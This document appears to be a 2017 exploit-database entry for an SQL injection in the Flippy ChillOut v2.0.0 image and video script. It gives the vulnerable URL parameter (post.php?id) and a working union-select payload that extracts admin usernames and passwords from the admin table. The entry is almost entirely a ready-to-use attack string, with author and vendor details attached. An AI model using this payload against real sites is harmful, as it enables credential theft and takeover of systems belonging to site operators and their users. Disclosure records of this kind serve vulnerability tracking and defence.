# # # # # # Exploit Title: Flippy ChillOut – Funny Image and Video Script v2.0.0 - SQL Injection # Google Dork: N/A # Date: 06.02.2017 # Vendor Homepage: https://www.flippyscripts.com/ # Software Buy: https://www.flippyscripts.com/flippy-chillout-funny-image-and-video-script/ # Demo: http://chillout.flippydemos.com/ # Version: 2.0.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/post.php?id=[SQL] # Etc... # -9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin-- # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-07]